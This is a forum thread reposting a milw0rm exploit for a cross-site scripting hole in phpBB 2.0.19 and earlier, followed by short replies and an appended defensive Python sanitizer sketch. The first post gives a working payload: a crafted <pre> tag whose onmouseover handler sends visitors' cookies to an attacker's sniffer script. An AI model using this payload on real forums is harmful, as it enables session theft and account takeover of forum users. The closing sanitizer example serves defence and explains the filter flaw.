phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

Discussion in 'Vulnerabilities' started by Rebz, 30 Jan 2006.

  1. Rebz

    Rebz Super Moderator
    Staff Member

    /*
    As long as html is ON in the latest version of phpBB forums,
    several XSS attack vectors are possible. phpBB incorrectly
    filters in both messages and profiles, making cookie stealing,
    and other XSS attacks possible. The exploit leads to arbitrary
    javascript execution, which in turn can lead to html defacement.

    use of the <pre> tag means that the cursor must pass it in the y
    direction only. e.g. the mouse only needs to cross a point
    horizontally equal to the link in order for the javascript to be executed.

    the following is a simple attack:
    */

    Code:
    <pre a='>' onmouseover='document.location="http://адрес_сниффера/сниффер.php?c="+document.cookie' b='<pre' >
    
    [url_]http://www.somesite.com/[/url_]</pre>
    * Remove the underscore "_" from the [url_] tag.

    # milw0rm.com [2006-01-29]
     
    5 people like this.
  2. MERTXX

    MERTXX New Member

  3. SanyaX

    SanyaX .::Club Life::.

    Cool, did you find it yourself or get it from somewhere?
     
    1 person likes this.
  4. m0nzt3r

    m0nzt3r моня

    Hmm, yeah =)
     
    1 person likes this.
  5. Gang100

    Gang100 Banned

    The vulnerability only works with HTML enabled on the forum, and there are very few such forums =(
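
Added example, not part of the original thread and not phpBB's code: a defensive sketch of why markup shaped like the one in the first post can slip past a filter that ends a tag at the first '>', and how a quote-aware parse with an attribute allowlist removes the event handler. The boundary-matching filter model, the `ALLOWED` list, the placeholder handler and all function names are assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample: attribute layout of the first post, placeholder handler.
SAMPLE = "<pre a='>' onmouseover='HANDLER' b='<pre' >link text</pre>"

# Assumed allowlist (tag -> permitted attribute names); not phpBB's own list.
ALLOWED = {"pre": set(), "b": set(), "i": set(), "u": set()}


def naive_first_tag(markup):
    """Assumed filter model: a tag ends at the first '>' character."""
    return re.match(r"<[^>]*>", markup).group(0)


class AllowlistSanitizer(HTMLParser):
    """Quote-aware parse; re-emit only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # (tag, attribute) pairs that were removed

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.out.append(escape(self.get_starttag_text()))
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED[tag]:
                kept.append(' %s="%s"' % (name, escape(value or "")))
            else:
                self.dropped.append((tag, name))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))


def sanitize(markup):
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out), parser.dropped
```

The naive model sees only `<pre a='>` as the tag and never inspects `onmouseover`, while `sanitize(SAMPLE)` parses all three attributes and emits a bare `<pre>` element.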
     